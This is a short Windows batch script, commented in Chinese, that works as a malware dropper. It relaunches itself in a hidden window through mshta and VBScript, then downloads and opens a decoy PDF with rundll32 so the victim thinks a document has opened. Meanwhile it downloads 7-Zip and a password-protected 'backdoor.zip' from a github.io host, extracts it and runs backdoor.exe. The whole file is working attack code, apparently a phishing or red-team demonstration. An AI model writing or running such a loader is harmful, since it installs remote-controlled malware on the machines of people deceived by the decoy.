::使用rundll32指令
@echo off

::利用rundll32指令開啟真正的PDF
start mshta vbscript:createobject("wscript.shell").run("""%~0"" h",0)(window.close)&&exit
:begin

curl https://sheng855174.github.io/pdf-test.pdf -o "%temp%\pdf-test.pdf"
rundll32 url.dll,FileProtocolHandler file:///%temp%/pdf-test.pdf

::下載7z檔案，並解將惡意程式下載到temp解壓縮後執行
curl https://sheng855174.github.io/7z.exe -o "%temp%\7z.exe"
curl https://sheng855174.github.io/7z.dll -o "%temp%\7z.dll"
curl https://sheng855174.github.io/backdoor.zip -o "%USERPROFILE%\backdoor.zip"
%temp%\7z.exe x %USERPROFILE%\backdoor.zip -p12345678 -o%USERPROFILE%
%USERPROFILE%\backdoor.exe
